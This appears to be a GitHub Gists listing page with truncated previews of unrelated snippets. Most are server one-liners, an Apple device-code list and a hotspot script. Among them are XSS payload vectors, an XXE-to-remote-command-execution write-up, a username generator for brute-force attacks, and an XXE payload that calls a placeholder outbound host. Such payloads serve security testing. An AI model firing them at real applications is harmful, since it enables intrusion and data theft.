Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # coding: utf-8 | |
| import os,socket,threading,time | |
| #import traceback | |
| allow_delete = False | |
| local_ip = socket.gethostbyname(socket.gethostname()) | |
| local_port = 8888 | |
| currdir=os.path.abspath('.') |
adamawolf
/ Apple_mobile_device_types.txt
Last active
November 4, 2025 08:23
List of Apple's mobile device codes types a.k.a. machine ids (e.g. `iPhone1,1`, `Watch1,1`, etc.) and their matching product names
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| i386 : iPhone Simulator | |
| x86_64 : iPhone Simulator | |
| arm64 : iPhone Simulator | |
| iPhone1,1 : iPhone | |
| iPhone1,2 : iPhone 3G | |
| iPhone2,1 : iPhone 3GS | |
| iPhone3,1 : iPhone 4 | |
| iPhone3,2 : iPhone 4 GSM Rev A | |
| iPhone3,3 : iPhone 4 CDMA | |
| iPhone4,1 : iPhone 4S |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt | |
| into a Remote Command Execution: | |
| NOTE: It relies on the PHP expect module being loaded | |
| (see http://de.php.net/manual/en/book.expect.php) | |
| joern@vbox-1:/tmp$ cat /var/www/server.php | |
| <? | |
| require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php"); | |
| Zend_Loader_Autoloader::getInstance(); |
JohannesHoppe
/ 666_lines_of_XSS_vectors.html
Created
May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
willurd
/ web-servers.md
Last active
November 5, 2025 20:58
Big list of http static server one-liners
dergachev
/ simple-https-server.py
Created
October 17, 2013 17:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ | |
| # generate server.xml with the following command: | |
| # openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
| # run as follows: | |
| # python simple-https-server.py | |
| # then in your browser, visit: | |
| # https://localhost:4443 | |
| import BaseHTTPServer, SimpleHTTPServer | |
| import ssl |
shalzz
/ wifi-hotspot.bat
Last active
March 11, 2021 21:06
[Windows Wifi Hotspot] Batch file for creating Wifi Hotspot using Microsoft Hosted Network Virtual Adapter #windows
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| REM Copyright (C) 2013 | |
| REM Shaleen Jain | |
| REM [email protected] | |
| REM | |
| REM Batch file for creating Wifi Hotspot | |
| if _%1_==_payload_ goto :payload | |
| :getadmin | |
| echo %~nx0: elevating self |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # ftpserver.py | |
| # | |
| # pyftpdlib is released under the MIT license, reproduced below: | |
| # ====================================================================== | |
| # Copyright (C) 2007 Giampaolo Rodola' <[email protected]> | |
| # | |
| # All Rights Reserved | |
| # | |
| # Permission to use, copy, modify, and distribute this software and |
superkojiman
/ namemash.py
Last active
October 28, 2025 19:41
Creating a user name list for brute force attacks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| ''' | |
| NameMash by superkojiman | |
| Generate a list of possible usernames from a person's first and last name. | |
| https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/ | |
| ''' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
OlderNewer